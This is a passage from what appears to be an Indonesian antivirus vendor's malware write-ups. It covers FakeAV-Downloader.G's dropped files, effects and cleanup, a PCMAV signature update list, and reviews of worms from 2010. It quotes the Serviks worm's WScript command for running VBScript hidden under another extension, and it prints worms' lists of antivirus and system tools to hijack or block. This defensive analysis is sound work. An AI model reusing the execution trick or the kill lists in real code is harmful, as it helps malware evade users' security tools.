AdFlu.dll, AGjIdq.dll, aHRKi.dll, AHsLUuiMN.exe, aIVjcAttD.dll, AkFtDVnIE.exe, aUKFFg.dll, ayGUb.exe, BcLJPDG.exe, bHCcPTtKl.dll, BhttmUcP.exe, bjQqAD.exe, BkXOXDIB.exe, BQKnMsiVy.exe, bWnMkEd.dll, BxepYyifS.dll, CGBJBNvx.exe, cGdHWxJeD.dll, CGhKQU.dll, ChQmMf.exe, cKQKUCps.dll, CkSIKHOKJ.exe, cmjtEJqB.dll, COwlR.dll, cQppfna.dll, CSowpmpOI.exe, CUhYx.exe, CvBFvmke.dll, DBjQM.exe, DJMJtU.dll, dJXTsn.exe, dKIqLHS.dll, doBuRK.dll, doFaKtxuU.dll, dQAKEFi.dll, DreYJ.dll, drivers, DtuQdUWB.exe, DXKxL.dll, DXnJDfiPs.exe, EACqQUCqw.exe, edqlMs.exe, EePVD.dll, eeYhpf.exe, EkLQL.dll, eLQDQG.dll, emjAJqqb.exe, EnOuyTKtw.exe, eoHtAjuk.exe, EPBsp.dll, ePgSNgbW.exe, faQcO.dll, faxDfcf.exe, FCDRbv.exe, fgcoFELjP.exe, fhIet.dll, FKDcA.exe, fMCmSmLf.exe, fnOfeyx.dll, fNVASnQ.dll, FQIxI.dll, FVBDB.dll, fvMUXM.dll, gFAhnXA.dll, GhnTwNMv.dll, GjkNjJ.exe, GKFoBJR.dll, gKHlVXTw.dll, gKxpIn.dll, GKYnurg.exe, gOqCPK.dll, gSnhtAoVC.dll, GSnugOp.exe, gsOpmYt.exe, GwCajJkS.exe, GWTbLMy.exe, GxbIv.exe, GyqPy.exe, HcDwIssoN.dll, hCffwqlPd.dll, HCRUw.exe, hCYGxcNr.exe, HGgXSe.dll, HKiSWgrp.dll, HmausKg.dll, hPGJi.exe, HrbTG.dll, iAflL.dll, iBAhXd.dll, IDEyEm.exe, IdUFBIkk.exe, ieMQPM.dll, igKBB.exe, iGNbKeG.exe, iGwHEMs.exe, IHvJao.dll, IIbqp.dll, iMXNBjkJ.exe, iPmkHTskQ.dll, IqUfOdX.exe, iREuARmf.exe, IrnRpOyO.dll, IshSDTqIw.dll, itRATcUa.exe, IugcCkHFk.dll, IwaEH.exe, IwJQohoLR.dll, iwwkHLots.exe, JCgICwbju.exe, JCqhGLnOB.exe, jdhSv.dll, jfpLlJTY.dll, JHNVxRjeP.exe, jIobcI.dll, jjSpveaa.exe, JNKVtC.dll, JQhwAggo.exe, jRHvGn.exe, JTMEOG.dll, JUmCjkS.dll, jvCTLGa.exe, JxDaBEl.dll, KAAMR.exe, kahWCv.exe, KBlxa.exe, kcdnIIj.exe, kGfBshwIh.dll, KGuXAjXS.dll, KmLJeRdan.dll, KqyqLCrS.exe, kSjCRs.dll, kSohW.dll, kSVFShpu.dll, KTgwRxL.exe, KVRMk.exe, kWdxYTR.exe, kWhocx.dll, LcoXSDf.exe, LGvhMKcpE.dll, LsTld.dll, lSXnxdDO.dll, lVkuL.dll, lYcGuHn.dll, MbwkuyDU.dll, mdtrO.exe, mHxIb.exe, MlYsiACC.dll, MRBJHpwk.dll, mULwnXcCJ.dll, muoseJ.dll, Muway.dll, NbnWk.exe, ncrWr.exe, ndeKXf.exe, nflFxatSA.exe, NGlDI.exe, nidwofS.exe, nIhSEPOCJ.exe, nJoNxb.exe, NOdUONtOQ.exe, nvLchJp.exe, NvxeXSmbx.exe, nxgdWadc.dll, OAgPP.dll, Ochfcem.dll, OhJQAYOc.exe, OiXgfgie.dll, OJnQABDLX.dll, OnjMQof.dll, OvrsdU.exe, OYOioF.exe, oYYNLEo.dll, PjPSrYM.exe, pLmxyu.dll, PnjarnfGu.exe, PpDRwE.dll, pPXbiJ.dll, PQskqYnX.exe, pWvnrvRW.dll, qEkUl.exe, QEXsyG.exe, qJXuJTPLb.dll, QvMIDpQk.dll, rBDVU.exe, RFkVUXL.exe, rFWhWQK.exe, RjFPEf.exe, rKWQdaCTE.exe, rnlXjp.exe, rNUpKVf.exe, rqnbfqee.exe, RSrwt.dll, RTCXhIhD.exe, rWEuG.dll, RXiwBdi.dll, SdoPWuxM.dll, seLtwjRQc.exe, SibvFf.dll, sJCkkoa.exe, smXWxug.dll, SnjVj.exe, srXlObet.dll, SvNelnOmd.exe, sxGcvX.dll, tanMCob.dll, tdOXkAqcu.dll, TEddcY.exe, tEmQDr.exe, Tfkqqdys.dll, TjwUlFt.exe, TlOEum.exe, tmdgc.exe, tNhMSJO.exe, TOIRNm.exe, tTfFXxOU.dll, TXpQq.exe, tyaePbhl.exe, uabhXfsj.dll, ufrclvJ.dll, UhaMfU.dll, uMPbG.exe, UPKnqEe.dll, uQBLufvl.dll, UXIHqkHJ.exe, VCaUxDAM.exe, vCSKMoVhH.exe, vHdmMjqy.exe, vOMhQucuJ.dll, vVCHo.exe, VxdnLJJ.dll, wBIKgUq.dll, WfABWQ.dll, wjhMnn.exe, WJord.dll, wlQtlFG.exe, WOmIUjkUY.exe, WrpQhNG.exe, XcMnkcy.dll, xDmMbwp.exe, xkjALe.dll, XkJIXcK.dll, xnLEOfou.exe, xnqCJ.exe, XTKXb.exe, XvSnm.exe, XYqHWe.exe, YdFjVF.exe, YDNUWEjDf.dll, YGxtyy.exe, yrfyvGP.exe, yvychuMC.exe
C:\WINDOWS\system32\drivers
AaUat.exe, aIoyuM.dll, aQdTu.dll, aWetMxvmP.exe, axfFtwra.dll, BasbyV.dll, Bcatx.exe, BEBJoS.dll, biCYNieU.exe, BKJFxDWrO.dll, BLfTvhA.dll, BtXiWvRT.exe, bXUlSmkM.exe, CbDTi.dll, cbgHTEYj.exe, chNSUtN.exe, CIvEF.dll, ckWVO.dll, cmbtnBb.dll, CnbvdFe.dll, CNgWSRB.exe, coIfhHPqR.dll, CrFfNcSdt.exe, cThUXJOV.dll, Cuvbeb.exe, DCNGSrb.dll, dhBAvLsBW.dll, dMOgf.dll, DNSjlFRn.dll, doHlNaSe.dll, dQCvkuV.exe, dsvtcVXc.dll, DTQHG.dll, EiOeM.dll, EJQUXAhBL.exe, eoHDGMV.dll, EoqAibh.dll, EsbPexXyG.exe, fCjAw.exe, FDEaqvrEt.dll, fdoHD.exe, ffdEq.dll, FJGXkwxoG.dll, fkCPSy.exe, fsTkkqD.exe, gCQgE.exe, GfTVcnlJ.exe, GGuuKlShh.exe, ggxCasODW.dll, gIvFQL.dll, GMlIjJ.dll, GqOOd.dll, GSVaS.dll, gUrJmp.dll, gXmfF.exe, GycNUj.dll, hALpPKJ.exe, HeqJNRGr.exe, hfDArFjX.dll, HHuarT.dll, HMtPXAniS.dll, hmtUeIJXL.exe, hOJbRbdat.exe, hpQAtlv.exe, hrEpSH.exe, HsLMOHTkh.exe, Hsmdw.exe, ibPwYwRNw.dll, IBuNlp.dll, icHWPAfXQ.exe, ifNpGyvk.exe, iIpWGM.exe, iKoLM.dll, illtmQP.exe, IsOvYbmL.exe, iYHDRH.dll, IYpTQnq.exe, JayutaGif.dll, JBSyLVV.exe, jeKhQkfuR.dll, jFlcUbsL.dll, jHKoJy.dll, jHPtJm.dll, JLsPswNa.dll, JMcly.dll, JoGyIgxog.exe, JpEkwBMw.dll, JTlPJbmGJ.dll, jtrDGeyCP.dll, jTYQN.dll, JVeGQMN.exe, JyIGecY.dll, JYlWQxpj.exe, jyopY.dll, KBPicSRw.dll, KibBCTdE.dll, kIDCblr.dll, KjokykXBV.exe, kjwIoj.exe, kOWsOSiv.exe, kPeJVjfQ.exe, krSbSX.exe, KsARfcADm.dll, kTxXWeMf.dll, KVNiDGy.exe, kvVkQ.exe, kyAXcqKTF.exe, LdsETEgfb.dll, LfPrRa.exe, LjTCi.dll, LKeuq.dll, LLmhM.dll, LLtDDXn.dll, lnbgkij.exe, LRoRNIMV.exe, MbkbmqOXp.dll, mDyTUlNYy.exe, MiGUqqywP.exe, mioYTJFha.dll, mKeWgXg.exe, MKsxvOo.dll, mqWrGGFn.exe, mUibhYO.dll, MYXaLJF.exe, NcDlJNWub.dll, NIhidXBGU.dll, NjVXaid.dll, nLPqB.dll, NMFGxXk.exe, NmSxLP.exe, NmTxBAJfR.exe, NUilI.exe, nyFFuaf.exe, OfUnknnvx.exe, OhCPa.exe, okdipND.exe, oLjYsGxqd.dll, OXLJfk.exe, PQAkvF.exe, prOWIRJ.dll, PTCnbbCEO.exe, pxabO.dll, QalAJBrTL.exe, QdOal.dll, qDRjBfcy.dll, qFrtL.dll, QGjuDf.exe, QnhQJ.dll, QRMyQJ.dll, QvrPMy.dll, RclRxyxfv.dll, RdviJRH.dll, RgkNQPp.exe, rJfRTrXC.dll, rlEyOBO.dll, ROqGadwe.exe, RsJpnAAQx.dll, RUStuuKp.dll, RwCAlcegD.dll, rwUoJlbG.exe, RXBCtDfF.dll, SCKKV.dll, SdyqsReyD.dll, SEfpPJ.dll, sFqOdas.exe, SHcPbj.dll, shNhWL.dll, SIMnls.dll, SnvXLcD.exe, SoaXUwnF.exe, SPMRCRYY.exe, sQQjqEqoP.exe, sTefHT.dll, swiWIs.dll, SWOSlR.dll, tGsmbmA.dll, tiGNRS.dll, tihFLXTw.exe, tikYwoXbX.exe, tJPEvul.dll, TKjkfyg.dll, TNageYk.dll, TOXIaj.dll, TVMmwTRi.exe, TwOVe.dll, tyKdGUnG.exe, uijnjW.exe, UKRceHpYR.dll, uQqYHkv.dll, UrNycc.dll, uTWnwpnl.exe, uwNhgfNgW.dll, VBrpheQHl.exe, vIXOH.exe, VjYyJ.dll, vqgafQ.exe, vrQIBO.dll, vsNIT.exe, VxoWqBTk.exe, vybMN.exe, VYnPBUoc.dll, WAhFt.exe, wAXGQYGXH.dll, wDBdocRj.dll, WgnvDiRbT.dll, wIqyCOM.exe, wKpgWTw.exe, wlGlYOd.dll, wlnPpfhK.dll, wPnqGPG.dll, WQsOSQarN.dll, WRaDp.exe, WreLeH.dll, WWBbulRe.exe, XcjXdLh.exe, XFImnkJGF.exe, XGpNyeFgV.exe, XKIEmFs.exe, xLoLpyL.exe, XLxrEaH.exe, xpgTxyKYF.exe, XpoXMwj.exe, xTiMuDDw.exe, xwrOd.dll, xWybDVX.dll, xxwlqARQS.exe, Xynuy.exe, YeBma.exe, yKdGhFLC.exe, yrbAm.exe, yuDKyrD.dll, YUhfr.dll
D. Hasil Infeksi

FakeAV-Downloader.G ini mecoba melakukan koneksi ke beberapa website yang beberapa sudah tidak aktif.
Selain koneksi, malware ini juga memiliki kemampuan seperti worm yang memperbanyak companionnya seperti yang sudah di jelaskan di atas. Agar pertahanan dan penyamarannya lebih terlihat sempurna, beberapa fungsi Windows di-disable seperti Task Manager, agar seakan mencirikan bahwa komputer yang sudah terinfeksi memang benar-benar terinfeksi malware lain. FakeAV-Downloader.G juga membuat beberapa pesan seperti:
FakeAV-Downloader.G DDoS
Adanya serangan DDoS
FakeAV-Downloader.G Smurf
Serangan Smurf yang merupakan salah satu serangan DDoS
FakeAV-Downloader.G Notifikasi
Notifikasi bawha komputer terinfeksi spyware
FakeAV-Downloader.G Register
Beberapa fungsi pada antivirus palsu yang didisable akan menampilkan pesan ini. User di haruskan melakukan registrasi agar fungsi tersebut berjalan.
FakeAV-Downloader.G Spam
Pesan bahwa adanya email spam.
E. Pembersihan
Gunakan PCMAV 4.5 Update Build3 untuk membersihkan FakeAV-Downloader.G.
PCMAV Detection
PCMAV Cleaning

PCMAV 4.5 Update Build3

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 4.5 Update Build1 telah hadir dengan penambahan 124 pengenal varian virus baru. Bagi Anda pengguna PCMAV 4.5, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.
Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.
Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:
SendSpace.com
ZippyShare.com (mirror)
Rapidshare.com (mirror)
Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.
Daftar tambahan virus hingga PCMAV 4.5 Update Build3:
Autoit.FB
Autoit.FC
Autoit.FC.ini
Autoit-ReplaceIcon.B
Autoit-ReplaceIcon.C
Baidu
Baidu.dll
Baidu.dns
Baidu.host
Baidu.inf
Beds
Bekol
BudiLuhur.C
BudiLuhur.C.inf
DelPS
DelPS.ini
DiaryMimi.vbs.B
DiaryMimi.vbs.B.ect
Ebetazijl.A
Ebetazijl.A.inf
Ebetazijl.B
Ebetazijl.B.lnk
FakeAV-Downloader.C
FakeAV-Downloader.C.lnk
FakeAV-Downloader.D
FakeAV-Downloader.D.dll
FakeAV-Downloader.E
FakeAV-Downloader.F
FakeAV-Downloader.F.exe
FakeAV-Downloader.F.job
FakeAV-Downloader.F.lnk.A
FakeAV-Downloader.F.lnk.B
FakeAV-Downloader.F.ref
FakeAV-Downloader.F.setup
FakeAV-Downloader.F.url
FakeAV-Downloader.G
Gerubug.vbs
Gerubug.vbs.gen
Gerubug.vbs.html
Gerubug.vbs.inf
Gerubug.vbs.lnk.A
Gerubug.vbs.lnk.B
HB10
HoneyMoon.vbs
HoneyMoon.vbs.inf
Khetex.B
M3Reincarnation.D
Malingsi.AA
Malingsi.Y
Malingsi.Z
Malingsi.Z.dll
Malingsi.Z.exe
Malingsi.Z.ini
Malingsi.Z.mrc
MerdekaTapiBingung.vbs
MerdekaTapiBingung.vbs.gen
MerdekaTapiBingung.vbs.html
MerdekaTapiBingung.vbs.inf
MerdekaTapiBingung.vbs.lnk.A
MerdekaTapiBingung.vbs.lnk.B
Mshearts.vbs.C
MsKunti.vbs
MsKunti.vbs.html
MsKunti.vbs.inf
MsKunti.vbs.ini
MsKunti.vbs.txt
Nami-Ternate
Nami-Ternate.bat.A
Nami-Ternate.bat.B
Nami-Ternate.bat.C
Nami-Ternate.bat.D
Nami-Ternate.inf.A
Nami-Ternate.inf.B
Nami-Ternate.ini.A
Nami-Ternate.ini.B
Nami-Ternate.ini.C
Nami-Ternate.txt.A
Nami-Ternate.txt.B
Poet-Kompti
Poet-Kompti.txt
Rascal
Rascal.bmp
Rascal.dat
Rascal.inf
Rascal.ini
Recycler.BK
Recycler.BK.inf
Recycler.BL
Recycler.BL.inf
Recycler.BM
Recycler.BM.inf
Recycler.BN
Recycler.BN.inf
RedWines.B
Restore.A
Restore.A.inf
Restore.B
Restore.B.inf
Restore.C
Restore.C.inf
Restore.D
Restore.D.inf
Restore.E
Restore.E.inf
Samok.vbs
Samok.vbs.bat
Samok.vbs.inf
Serviks.C
Serviks.C.html
Serviks.C.inf
Serviks.C.vbs
Sherry
Twext
Twext.exe
VB-Shortcut-WLogon.A
VB-Shortcut-WLogon.B
VB-Shortcut-WLogon.C
VB-Shortcut-WLogon.D
VB-Shortcut-WLogon.E
VB-Shortcut-WLogon.F
VB-Shortcut-WLogon.G
Xoobuo
X-Power
X-Power.inf
    • Mendisable fungsi windows seperti, Registry Editor, Disable Show Hidden File and Show Extension, Task Manager.
    • Membuat startup pada registry:

Review Malware

Top Malware
Seperti tidak ada habisnya serangan dari malware yang berasal dari dalam maupun luar negeri. Antara lain Conficker yang mengawali serangan pada tahun 2008, dan berbagai varian worm VB-Shortcut yang memulai aksinya di pertengahan 2010, serta berbagai malware lainnya, berhasil memberikan teror di sampai akhir tahun 2010 karena tingkat penyebarannya.
Berdasarkan data yang kami kumpulkan yang sebagian besar dari kiriman pengguna PCMAV, 10 malware teratas yang paling banyak menyebar adalah:
1. Sality Variant
2. VB-Shortcut
3. Alman
4. Virut
5. Serviks.vbs Variant
6. 74BE16
7. Conficker
8. Autoit-ReplaceIcon Variant
9. Saphira.A
10. Autoit.EA
Malware lain yang juga banyak dilaporkan:
- EsTeh
- Stuxnet
- Runouce
- Nebula
- Delp-Shortcut
- TripleBox
- Bebek.A
- Malingsi Variant
Selain itu, berikut beberapa review malware yang relatif merupakan nama-nama baru yang menghebohkan di tahun 2010 ini.
1. Zhola.
Zhola Worm Zhola sebenarnya merupakan hasil edit dari malware tipe worm yang source codenya banyak beredar. Dengan merubah bentuk icon dan isi autorunnya, worm ini membuat banyak pengguna salah satu antivirus lokal terinfeksi karenanya, terlebih karena worm ini sengaja diletakkan pada website yang menyediakan Free File Sharing sehingga dapat di-download siapa saja. Pertama kali ditemukan worm ini menggunakan nama “Smadav 7.3”. Worm Zhola akan memperbanyak companion-nya jika menemukan file dengan ekstensi *.doc *.jpg *.mp3 *.avi *.mpeg *.3gp *.flv *.mpg *.mov *.wmv *.wav *.3gp2 dan membuat file dengan nama yang sama.
2. EsTeh.
EsTeh
Dibuat dengan menggunakan bahasa pemrograman Visual Basic 6.0 tanpa di- pack, memiliki icon yang beragam pada setiap file yang dibuatnya. Worm ini membuat banyak file pada flash disk dengan menggunakan icon yang sudah terdapat pada komputer yang sudah terinfeksi sebelumnya dan terdapat pada folder:
C:\Documents and Settings\[nama user]\Local Settings\Temp\doc.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\folder.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\mptre.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\rar.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\txt.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\wmp.ico
C:\Documents and Settings\[nama user]\Local Settings\Temp\xls.ico
Selain itu, worm ini juga membuat file yang dijadikan hostnya seperti:
C:\WINDOWS\system32\32rc.exe
C:\WINDOWS\system32\3dPAD.exe
C:\WINDOWS\system32\Epen.exe
C:\WINDOWS\system32\sym32.exe
C:\WINDOWS\system32\temp32.exe
C:\WINDOWS\system32\userinity.exe
C:\Documents and Settings\[nama user]\Local Settings\Temp\Usbconeted.exe
Worm ini juga membuat file Autorun.inf seperti pada gambar di atas.
Ulasan selebihnya dapat dibaca pada http://virusindonesia.com/2010/02/26/esteh-pcmav-23-update-build4/
3. MyLovely.
Malware tipe worm, memiliki icon menyerupai file image tipe jpg. Hasil infeksi worm MyLovely akan ditemukan pada setiap drive dengan nama Gambar Lucu.exe, Kasihku.exe, Photo 01.exe, Wallpaper.exe.  Beberapa aplikasi dengan nama di bawah ini akan diubah sehingga menjalankan file malware di C:\wallpaper.exe:
1. ansav.exe
2. ansav32.exe
3. BLUESOLEIL.exe
4. call.exe
5. Ccapp.exe
6. cclaw.exe
7. cmd.exe
8. dfrg.exe
9. DXDIAG.exe
10. Fixinstall.exe
11. FORMAT.exe
12. freecell.exe
13. GRAPH.exe
14. IEXPLORE.exe
15. install.exe
16. keygen.exe
17. mplayer.exe
18. msconfig.exe
19. MSPAINT.exe
20. Nip.exe
21. Nipsvc.exe
22. Niu.exe
23. Njeeves.exe
24. nod32.exe
25. NOD32krn.exe
26. notepad.exe
27. Nvccf.exe
28. Nvcoas.exe
29. Nvcod.exe
30. Nvcsched.exe
31. OIS.exe
32. PCMAV.exe
33. PCMV-CLN.exe
34. PCMV-RTP.exe
35. ppclean.exe
36. Procexp.exe
37. regedit.exe
38. RemoteCmdSvc.exe
39. Restore my files.exe
40. RSTRUI.exe
41. save.exe
42. SCRNSAVE.exe
43. setup.exe
44. shutdown.exe
45. Taskkill.exe
46. tasklist.exe
47. taskmgr.exe
48. Unins000.exe
49. Uninstall.exe
50. unlocer.exe
51. unlocker.exe
52. Update.exe
53. vb6.exe
54. VFP9.exe
55. VPREVIEW.exe
56. VProConsole.exe
57. VProConsole_.exe
58. wmplayer.exe
59. ypsr.exe
60. ypsrru.exe
61. Zanda.exe
62. Zlh.exe
Selama beberapa detik worm ini akan membuat layar menjadi black screeen yang jika di double click akan muncul gambar dibawah ini:
MyLovely
http://virusindonesia.com/2010/08/11/mylovely-menebar-pesan-cinta/
4. SetRun.
Berikut ini adalah gambar simulasi worm SetRun yang seakan mencirikan sebuah virus padahal termasuk tipe worm.
SetRun
Dengan menggunakan icon menyerupai Microsoft Word, worm SetRun dibuat menggunakan bahasa pemrograman Delphi tanpa di-pack dan memiliki ukuran yang selalu berubah agar menyulitkan antivirus untuk mendeteksinya. Sesuai dengan gambar di atas, jika worm SetRun menemukan file *.doc, *.xls, dan *.pdf, ia akan merename file aslinya mulai dari belakang, kemudia di tambahkan karakter “pns” dan kondisinya ter-hidden. Sedangkan nama file dijadikan replika dari worm SetRun.
http://virusindonesia.com/2010/09/13/setrun-social-engineering-dengan-icon/
5. Nebula.
Nebula
Gambar di atas adalah pesan yang dibuat oleh malware tipe virus bernama Nebula. Kemampuannya menginfeksi beberapa file dengan tipe seperti, *.doc, *.docx, *.xls, *.xlsx, *.avi, *.3gp , *.exe (hanya untuk file *.exe tertentu, seperti YahooMessenger.exe, Firefox.exe, Iexplore.exe, Opera.exe) hampir sama seperti virus Kspoold. Virus ini merubah file dengan ekstensi yang sudah di jelaskan di atas menjadi exe. Beberapa antivirus mampu mengenali malware ini, akan tetapi sebagian besar menghapus file yang sudah terinfeksinya, padahal virus ini belum menghapus file asli, hanya menyimpan di dalam tubuhnya dengan enkripsi tertentu.
6. Serviks.vbs.B.
Serviks
Menggunakan enkripsi dan manipulasi ekstensi, worm ini menyebar dengan cepat. Diduga dibuat oleh orang yang membuat worm Vinurika.vbs dan Yuyun.vbs. keistimewaan lain worm ini adalah shortcut yang dibuatnya. Berbeda dengan worm shortcut yang lain, Serviks.vbs.B ini mampu menyebarkan shortcut sampai ke sub folder sampai 4 level kedalaman. dan didalam shortcutnya sudah dibuat agar mampu menjalankan malware tipe VBScript yang ekstensinya bukan *.vbs dengan perintah:
Wscript.exe //E:VBScript [nama malware]
http://virusindonesia.com/2010/09/03/satu-pesan-cinta-ribuan-shortcut/
7. Runouce.
Runouce
Beberapa malware memiliki payload yang destruktif, seperti menghapus, mengenkripsi, atau merusak data. Salah satunya adalah virus Runouce ini. Selain nama Runouce, virus ini juga dikenal oleh antivirus luar dengan nama lain seperti: Chir.B, ChiHack, Runonce, atau EmailWorm. Virus ini berasal dari luar (diduga dari China). Walaupun bukan termasuk virus baru, Runouce masih menyebar cukup luas termasuk di Indonesia. Ia memiliki karakteristik worm karena dapat menyebar melalui e-mail dengan mengirimkan dirinya sebagai attachment, Runouce juga merupakan sebuah virus yang menginfeksi executable file, yang terdapat pada komputer lokal maupun jaringan.
8. Nami-Ternate.
Nami-Ternate
Beberapa pengguna suka dengan tampilan yang berbeda. Tetapi waspadai jika tahu-tahu Anda mendapatkan tampilan seperti pada gambar di atas, karena bisa jadi itu merupakan indikasi bahwa malware Nami-Ternate telah aktif. Dibuat menggunakan Visual Basic tanpa di-pack, worm ini dapat membuat flash disk dan semua drive pada komputer Anda memiliki background seperti pada gambar. Worm juga mendisable beberapa fungsi seperti Task Manager, Regedit, dan lain lain.
9. VB-Shortcut-WinLogon.
VB-Shortcut-WinLogon
Dari sebagian banyak worm VB-Shortcut, VB-Shortcut-WinLogon adalah salah satu varian yang paling merepotkan pengguna yang terinfeksi. Kemampuan meng-kill beberapa tools dan perlindungan diri dari antivirus membuat worm ini tidak mudah dilumpuhkan. Begitu banyak registry yang di rubah worm ini, berikut adalah nama-nama program yang di-block oleh VB-Shortcut-WinLogon.

a2servic.exe, ackwin32.exe, acs.exe, advxdwin.exe, agentsvr.exe, agentw.exe, ahnsd.exe, alerter.exe, alertsvc.exe, alogserv.exe, amon.exe, amon9x.exe, anti-trojan.exe, antigen.exe, antivirus.exe, ants.exe, apimonitor.exe, aplica32.exe, apvxdwin.exe, ashWebSv.exe, atcon.exe, atguard.exe, atro55en.exe, atupdater.exe, atwatch.exe, aupdate.exe, autodown.exe, autotrace.exe, autoupdate.exe, avcenter.exe, avconfig.exe, avconsol.exe, ave32.exe, avgcc32.exe, avgctrl.exe, avgemc.exe, avgnt.exe, avgserv.exe, avgserv9.exe, avguard.exe, avgw.exe, avkpop.exe, avkserv.exe, avkservice.exe, avkwcl9.exe, avkwctl9.exe, avnotify.exe, avnt.exe, avp.exe, avp32.exe, avpcc.exe, avpdos32.exe, avpexec.exe, avpinst.exe, avpm.exe, avpmon.exe, avpnt.exe, avptc32.exe, avpupd.exe, avrescue.exe, avscanavshadow.exe, avsched32.exe, avsynmgr.exe, avupgsvc.exe, avwebloader.exe, avwin95.exe, avwinnt.exe, avwsc.exe, avwupd32.exe, avxmonitor9x.exe, avxmonitornt.exe, avxquar.exe, avxw.exe, azonealarm.exe, bd_professional.exe, bidef.exe, bidserver.exe, bipcp.exe, bipcpevalsetup.exe, bisp.exe, blackd.exe, blackice.exe, boot.exe, bootwarn.exe, borg2.exe, bs120.exe, BullGuard.exe, callmsi.exe, ccapp.exe, ccevtmgr.exe, cclaw.exe, ccpxysvc.exe, ccsetmgr.exe, ccshtdwn.exe, cdp.exe, cfgwiz.exe, cfiadmin.exe, cfiaudit.exe, cfind.exe, cfinet.exe, cfinet32.exe, chrome.exe, ChromeSetup.exe, clamauto.exe, claw95.exe, claw95cf.exe, claw95ct.exe, clean.exe, cleaner.exe, cleaner3.exe, cleanpc.exe, cmd.exe, cmgrdian.exe, cmon016.exe, connectionmonitor.exe, consent.exe, cpd.exe, cpdclnt.exe, cpf.exe, cpf9x206.exe, cpfnt206.exe, crashreporter.exe, csinject.exe, csinsm32.exe, css1631.exe, ctfmon.exe, ctrl.exe, cv.exe, cwnb181.exe, cwntdwmo.exe, defalert.exe, defscangui.exe, defwatch.exe, deputy.exe, Diskmon.exe, doors.exe, dpf.exe, drvins32.exe, drwatson.exe, drweb32.exe, dumphive.exe, dv95.exe, dv95_o.exe, dvp95.exe, dvp95_0.exe, earthagent.exe, ecengine.exe, ecls.exe, ecmd.exe, edi.exe, efinet32.exe, efpeadm.exe, egui.exe, EHttpSrv.exe, ekrn.exe, ent.exe, esafe.exe, escanh95.exe, escanhnt.exe, escanv95.exe, espwatch.exe, etrustcipe.exe, evpn.exe, ewido.exe, exantivirus-cnet.exe, exit.exe, expert.exe, explored.exe, f-agnt95.exe, f-prot.exe, f-prot95.exe, f-stopw.exe, fa-setup.exe, fact.exe, fameh32.exe, fast.exe, fch32.exe, fih32.exe, Filemon.exe, findviru.exe, firefox.exe, firewall.exe, FirewallControlPanel.exe, FirewallSettings.exe, fix-it.exe, flowprotector.exe, fnrb32.exe, fp-win.exe, fp-win_trial.exe, FPAVServer.exe, fprot.exe, fprot95.exe, frw.exe, fsaa.exe, fsav.exe, fsav32.exe, fsav530stbyb.exe, fsav530wtbyb.exe, fsav95.exe, fsave32.exe, fsgk32.exe, fslaunch.exe, fsm32.exe, fsma32.exe, fsmb32.exe, fssm32.exe, fwenc.exe, fwinstall.exe, gbmenu.exe, gbpoll.exe, GenericRenosFix.exe, generics.exe, gibe.exe, GoogleToolbarInstaller_download_signed.exe, gpedit.exe, guard.exe, guarddog.exe, guardgui.exe, guardhlp.exe, hacktracersetup.exe, helper.exe, HiJackThis.exe, HJTInstall.exe, HostsChk.exe, htlog.exe, hwpe.exe, iamapp.exe, iamserv.exe, iamstats.exe, ibmasn.exe, ibmavsp.exe, icload95.exe, icloadnt.exe, icmon.exe, icmoon.exe, icssuppnt.exe, icsupp.exe, icsupp95.exe, icsuppnt.exe, IEDFix.exe, iface.exe, ifw2000.exe, iomon98.exe, iparmor.exe, iris.exe, isrv95.exe, jammer.exe, jed.exe, jedi.exe, kav8.0.0.357es.exe, kavlite40eng.exe, kavpers40eng.exe, kavsvc.exe, kerio-pf-213-en-win.exe, kerio-wrl-421-en-win.exe, kerio-wrp-421-en-win.exe, killprocesssetup161.exe, kis8.0.0.506latam.exe, kpf.exe, kpfw32.exe, ldnetmon.exe, ldpro.exe, ldpromenu.exe, ldscan.exe, licmgr.exe, localnet.exe, lockdown.exe, lockdown2000.exe, lookout.exe, lsetup.exe, luall.exe, luau.exe, lucomserver.exe, luinit.exe, luspt.exe, mbam.exe, mbamgui.exe, mbamservice.exe, mcagent.exe, mcmnhdlr.exe, mcshield.exe, mctool.exe, mcuimgr.exe, mcupdate.exe, mcvsrte.exe, mcvsshld.exe, mdll.exe, mfw2en.exe, mfweng3.02d30.exe, mgavrtcl.exe, mgavrte.exe, mghtml.exe, mgui.exe, minilog.exe, monitor.exe, monsys32.exe, monsysnt.exe, monwow.exe, moolive.exe, mpfagent.exe, mpfservice.exe, mpftray.exe, mrflux.exe, MSASCui.exe, msblast.exe, msconfig.exe, msinfo32.exe, msn.exe, mspatch.exe, mssmmc32.exe, mu0311ad.exe, mwatch.exe, mxtask.exe, n32scan.exe, n32scanw.exe, nai_vs_stat.exe, nav32_loader.exe, nav80try.exe, navap.exe, navapsvc.exe, navapw32.exe, navauto-protect.exe, navdx.exe, naveng.exe, navengnavex15.exe, navex15.exe, navlu32.exe, navnt.exe, navrunr.exe, navsched.exe, navstub.exe, navw.exe, navw32.exe, navwnt.exe, nc2000.exe, ncinst4.exe, nd98spst.exe, ndd32.exe, ndntspst.exe, neomonitor.exe, neowatchlog.exe, netarmor.exe, netcfg.exe, netinfo.exe, netmon.exe, netscanpro.exe, Netscape.exe, netspyhunter-1.2.exe, netstat.exe, netutils.exe, nisserv.exe, nisum.exe, nmain.exe, nod32.exe, normist.exe, norton_internet_secu_3.0_407.exe, notstart.exe, npf40_tw_98_nt_me_2k.exe, npfmessenger.exe, nprotect.exe, npscheck.exe, npssvc.exe, nsched32.exe, ntdetect.exe, 